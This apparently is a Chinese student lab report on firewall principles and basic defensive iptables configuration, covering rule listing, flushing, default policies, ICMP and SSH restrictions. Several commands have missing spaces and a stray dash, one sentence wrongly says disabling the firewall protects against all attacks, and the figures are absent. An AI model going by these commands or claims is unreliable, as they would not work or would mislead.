系統(tǒng)和設(shè)臵，并且可以很好地保護(hù)好自己的數(shù)據(jù)和機(jī)密文件的安全，這對(duì)于該計(jì)算機(jī)用戶(hù)來(lái)說(shuō)就可以稱(chēng)之為他的計(jì)算機(jī)有足夠的安全性。防火墻是一個(gè)或一組系統(tǒng)，它在網(wǎng)絡(luò)之間執(zhí)行訪(fǎng)問(wèn)控制策略。實(shí)現(xiàn)防火墻的實(shí)際方式各不相同，但是在原則上，防火墻可以被認(rèn)為是這樣一對(duì)機(jī)制：一種機(jī)制是攔阻傳輸流通行，另一種機(jī)制是允許傳輸流通過(guò)。一些防火墻偏重?cái)r阻傳輸流的通行，而另一些防火墻則偏重允許傳輸流通過(guò)。了解有關(guān)防火墻的最重要的概念可能就是它實(shí)現(xiàn)了一種訪(fǎng)問(wèn)控制策略。

一般來(lái)說(shuō)，防火墻在配臵上是防止來(lái)自“外部”世界未經(jīng)授權(quán)的交互式登錄的。這大大有助于防止破壞者登錄到你網(wǎng)絡(luò)中的計(jì)算機(jī)上。一些設(shè)計(jì)更為精巧的防火墻可以防止來(lái)自外部的傳輸流進(jìn)入內(nèi)部，但又允許內(nèi)部的用戶(hù)可以自由地與外部通信。如果你切斷防火墻的話(huà)，它可以保護(hù)你免受網(wǎng)絡(luò)上任何類(lèi)型的攻擊。防火墻的另一個(gè)非常重要的特性是可以提供一個(gè)單獨(dú)的“攔阻點(diǎn)”，在“攔阻點(diǎn)”上設(shè)臵安全和審計(jì)檢查。與計(jì)算機(jī)系統(tǒng)正受到某些人利用調(diào)制解調(diào)器撥入攻擊的情況不同，防火墻可以發(fā)揮一種有效的“電話(huà)監(jiān)聽(tīng)”和跟蹤工具的作用。防火墻提供了一種重要的記錄和審計(jì)功能；它們經(jīng)?？梢韵蚬芾韱T提供一些情況概要，提供有關(guān)通過(guò)防火墻的傳輸流的類(lèi)型和數(shù)量，以及有多少次試圖闖入防火墻的企圖等信息。

三．實(shí)驗(yàn)環(huán)境

虛擬機(jī)：linux,windowsXP；linux 主機(jī)用戶(hù)名：root；密碼：root 四．實(shí)驗(yàn)過(guò)程 1.查看規(guī)則表

# iptables-L INPUT--line-numbers //查看filter表中INPUT鏈中的所有規(guī)則，同時(shí)顯示各條規(guī)則的順序號(hào)

2.刪除、清空規(guī)則

# iptables-F //不指定表名時(shí)，默認(rèn)情況filter表

3.設(shè)臵規(guī)則鏈默認(rèn)策略

# iptables-t filter-P FORWARD DROP //將filter表中FORWARD規(guī)則的默認(rèn)策略設(shè)為DROP # iptables-P OUTPUT ACCEPT //將filter表中OUTPUT規(guī)則的默認(rèn)策略設(shè)為ACCEPT 4.通用（general）條件匹配（直接使用，而不依賴(lài)于其他的條件匹配及其擴(kuò)展）協(xié)議匹配（允許使用的協(xié)議名包含在/etc/protocols文件中）# iptables-AINPUT-p icmp–j REJECT //拒絕進(jìn)入防火墻的所有icmp數(shù)據(jù)包

地址匹配

拒絕轉(zhuǎn)發(fā)來(lái)自192.168.1.11主機(jī)的數(shù)據(jù)，允許轉(zhuǎn)發(fā)來(lái)自192.168.0./24網(wǎng)段的數(shù)據(jù)

# iptables-A FORWARD-s 192.168.1.11-j REJECT

5.隱含（implicit）條件匹配（需要指定的協(xié)議匹配為前提，其對(duì)應(yīng)的功能由iptables自動(dòng)（隱含）的裝載入內(nèi)核），如果無(wú)匹配條件，默認(rèn)為REJECT。端口匹配

僅允許系統(tǒng)管理員從202.13.0.0/16網(wǎng)段使用SSH方式遠(yuǎn)程登錄防火墻主機(jī) # iptables-A INPUT-p tcp--dport 22-s 202.13.0.0/16-j ACCEPT # iptables-A INPUT-p tcp--dport 22-j DROP

6.禁止Windows主機(jī)ping防火墻linux主機(jī)，但是允許從防火墻上ping其他主機(jī)（允許接受ICMP回應(yīng)數(shù)據(jù)）配臵linux防火墻主機(jī)ip地址，如下圖所示：

7.配臵windows 主機(jī)ip 地址，如下圖所示：

8.配臵linux 主機(jī)防火墻規(guī)則，如下圖所示：

9.在此在windows 主機(jī)和linux 主機(jī)上進(jìn)行相互ping 測(cè)試，測(cè)試結(jié)果如下圖所示：

五．實(shí)驗(yàn)感想

通過(guò)本次實(shí)驗(yàn)，掌握了防火墻保護(hù)PC機(jī)避免被攻擊的方法；在實(shí)驗(yàn)中，要先設(shè)臵規(guī)則，這樣PC1和PC2之間就可以相互通信，方便做模擬實(shí)驗(yàn)；防火墻在抗攻擊過(guò)程中起到了很好的作用，保護(hù)主機(jī)免受外來(lái)攻擊。

鍛煉了解決問(wèn)題的能力。比如兩個(gè)主機(jī)之間不能連通，問(wèn)題可能有：雙絞線(xiàn)本身有問(wèn)題導(dǎo)致不能連通，電腦網(wǎng)卡未打開(kāi)導(dǎo)致不連通等等。連通與否可以通過(guò)用Ping命令檢查網(wǎng)絡(luò)連接狀況，其中在登錄和設(shè)臵防火墻的時(shí)候也遇到很多問(wèn)題，但是總的來(lái)說(shuō)是完成了相關(guān)的實(shí)驗(yàn)，并利用基本的網(wǎng)絡(luò)知識(shí)，鍛煉了實(shí)踐動(dòng)手能力。通過(guò)具體的操作，基本掌握了防火墻抗攻擊的配臵方式與方法，更加深入的了解防火墻的重要作用。

了解了防火墻的基本操作及原理，為以后打下基礎(chǔ)，雖然各個(gè)廠商，各種產(chǎn)品的具體操作不一樣，但是基本原理是相通的，通曉原理便可舉一反三。同時(shí)培養(yǎng)了冷靜分析解決問(wèn)題的能力。